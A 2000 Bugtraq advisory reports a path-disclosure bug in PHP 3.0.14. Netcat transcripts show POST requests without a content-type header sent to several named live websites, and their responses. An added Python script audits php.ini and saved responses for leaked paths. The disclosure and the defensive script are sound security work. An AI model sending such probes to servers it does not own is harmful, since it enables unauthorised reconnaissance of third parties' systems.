Date:         Thu, 15 Jun 2000 17:21:59 -0500
From: H D Moore <hdm@SECUREAUSTIN.COM>
Subject:      PHP 3.0.14 Disclosure via POST requests
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

I noticed some not-so-good behavior in PHP 3.0.14 when dealing with POST
requests that do not contain a content-type header in the request
(illegal).  The server will return the page anyways, but the first line
will be a PHP warning message containing the full path to that file.
The PHP developers have _not_ been notified because the bug (?) only
appears in older versions of their software (4.0 has been released) and
the fact that path disclosure is a weak vulnerability by itself.  The
only reason I bothered posting this is because of the inordinate amount
of interest on Bugtraq about NT's IIS giving away the pathnames to
scripts.  Disabling PHP's warning messages can be done by changing the
line in php.ini reading:

display_errors  =       On      ; Print out errors (as a part of the
HTML script)

to:

display_errors  =       Off      ; Print out errors (as a part of the
HTML script)

and restarting the webserver.

-HD

http://www.secureaustin.com
http://www.digitaldefense.net



Below are the results of my testing:

---[ PHP 3.0.14

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.secureaustin.com 80
POST /index.php3 HTTP/1.0
Host: www.secureaustin.com

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 22:06:13 GMT
Server: Apache/1.3.11 (Unix) PHP/3.0.14 mod_ssl/2.5.0 OpenSSL/0.9.4
X-Powered-By: PHP/3.0.14
Connection: close
Content-Type: text/html

<br>
<b>Warning</b>:  POST Error: content-type missing in
<b>/home/www/htdocs/secureaustin/index.php3</b> on line <b>1

---[ PHP 3.0.9

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.worldcupadvisor.com 80
POST /Main_Menu/body_main_menu.php3 HTTP/1.0
Host: www.worldcupadvisor.com

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 22:01:40 GMT
Server: Apache/1.3.3 (Unix) PHP/3.0.9 FrontPage/3.0.4.3
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
[ snip ]

hdm@atrophy:/var/www/htdocs/secureaustin >


---[ PHP 4.0B2

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.stonekeep.com 80
POST /ksonline/visitor.php3 HTTP/1.0
Host: www.stonekeep.com

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 21:57:11 GMT
Server: Apache/1.3.9 (Unix) PHP/4.0B2
Connection: close
Content-Type: text/html

<br>
<b>Fatal error</b>:  No content-type in POST request in <b>[no active
file]</b> on line <b>0</b><br>
hdm@atrophy:/var/www/htdocs/secureaustin >

---[ PHP 4.0

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.freshmeat.net 80
POST / HTTP/1.0
Host: www.freshmeat.net

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 21:48:59 GMT
Server: Apache/1.3.12 (Unix) PHP/4.0.0
Connection: close
Content-Type: text/html

<br>
<b>Fatal error</b>:  No content-type in POST request in <b>Unknown</b>
on line <b>0</b><br>
hdm@atrophy:/var/www/htdocs/secureaustin >

---[ PHP 4.0.1-dev

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.php.net 80
POST /quickref.php HTTP/1.0
Host: www.php.net

hdm@atrophy:/var/www/htdocs/secureaustin >


^-- just disconnects
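The two defender-side checks the post implies, as an added Python example that is not part of the original Bugtraq message: first, reading the `display_errors` directive out of a php.ini fragment the way PHP does (trailing `;` comments stripped, key matched case-insensitively, the on/off value normalised), and second, scanning a captured HTTP response for a PHP error line of the form `<b>Warning</b>: ... in <b>file</b> on line <b>N</b>` and reporting only those whose file part is an absolute filesystem path. The sample responses are transcribed from the transcripts above; the php.ini lines are the ones quoted in the post; the regular expressions and the function names are this example's own, and the assumption that a missing `display_errors` directive falls back to PHP's built-in default of On is noted in a comment.

```python
import re

# php.ini fragments constructed from the two lines quoted in the post.
INI_DISPLAY_ON = "display_errors  =       On      ; Print out errors (as a part of the HTML script)\n"
INI_DISPLAY_OFF = "display_errors  =       Off     ; Print out errors (as a part of the HTML script)\n"


def ini_value(ini_text, key):
    """Return the value of `key` from php.ini-style text, or None if absent.
    Drops ';' comments, skips [section] headers, matches the key case-insensitively."""
    for line in ini_text.splitlines():
        body = line.split(';', 1)[0].strip()        # strip trailing comment
        if not body or body.startswith('[') or '=' not in body:
            continue
        name, value = body.split('=', 1)
        if name.strip().lower() == key.lower():
            return value.strip().strip('"').lower()
    return None


def display_errors_enabled(ini_text):
    """True when errors would be printed into the HTML output.
    Assumption (documented PHP behaviour): when the directive is missing,
    PHP's built-in default for display_errors is On."""
    value = ini_value(ini_text, 'display_errors')
    if value is None:
        return True
    return value in ('on', '1', 'true', 'yes')


# PHP's HTML error line: <b>Level</b>: message in <b>file</b> on line <b>N</b>
# \s+ around "in" tolerates the line wrapping seen in the captured responses.
PHP_ERROR_RE = re.compile(
    r'<b>(?P<level>Warning|Fatal error|Parse error|Notice)</b>:\s*'
    r'(?P<msg>.*?)\s+in\s+<b>(?P<file>[^<]*)</b>',
    re.IGNORECASE | re.DOTALL)

# Unix "/..." or Windows "C:\..." absolute path; "[no active file]" and "Unknown" do not match.
ABS_PATH_RE = re.compile(r'^(?:/|[A-Za-z]:[\\/])\S')


def leaked_paths(body):
    """Absolute paths disclosed by PHP error lines in an HTML body."""
    found = []
    for m in PHP_ERROR_RE.finditer(body):
        path = ' '.join(m.group('file').split())     # collapse wrapped whitespace
        if ABS_PATH_RE.match(path):
            found.append(path)
    return found


def audit_response(raw):
    """Split a raw HTTP/1.x response into headers and body; report Server header and leaks."""
    head, _, body = raw.replace('\r\n', '\n').partition('\n\n')
    server = None
    for line in head.split('\n')[1:]:                # skip the status line
        name, _, value = line.partition(':')
        if name.strip().lower() == 'server':
            server = value.strip()
    return {'server': server, 'leaked_paths': leaked_paths(body)}


# Responses transcribed from the post's transcripts (headers and bodies as captured).
RESP_PHP3 = """HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 22:06:13 GMT
Server: Apache/1.3.11 (Unix) PHP/3.0.14 mod_ssl/2.5.0 OpenSSL/0.9.4
X-Powered-By: PHP/3.0.14
Connection: close
Content-Type: text/html

<br>
<b>Warning</b>:  POST Error: content-type missing in
<b>/home/www/htdocs/secureaustin/index.php3</b> on line <b>1
"""

RESP_PHP4B2 = """HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 21:57:11 GMT
Server: Apache/1.3.9 (Unix) PHP/4.0B2
Connection: close
Content-Type: text/html

<br>
<b>Fatal error</b>:  No content-type in POST request in <b>[no active
file]</b> on line <b>0</b><br>
"""

RESP_PHP4 = """HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 21:48:59 GMT
Server: Apache/1.3.12 (Unix) PHP/4.0.0
Connection: close
Content-Type: text/html

<br>
<b>Fatal error</b>:  No content-type in POST request in <b>Unknown</b>
on line <b>0</b><br>
"""

if __name__ == '__main__':
    print('display_errors On  ->', display_errors_enabled(INI_DISPLAY_ON))
    print('display_errors Off ->', display_errors_enabled(INI_DISPLAY_OFF))
    for name, resp in (('PHP 3.0.14', RESP_PHP3), ('PHP 4.0B2', RESP_PHP4B2), ('PHP 4.0', RESP_PHP4)):
        print(name, audit_response(resp))
```

Run against saved responses from your own servers, the audit flags the PHP 3.0.14 case (an absolute path in the file slot) and passes the two PHP 4 cases, where the file slot holds `[no active file]` or `Unknown`; the ini check is the companion test for the `display_errors = Off` fix the post recommends.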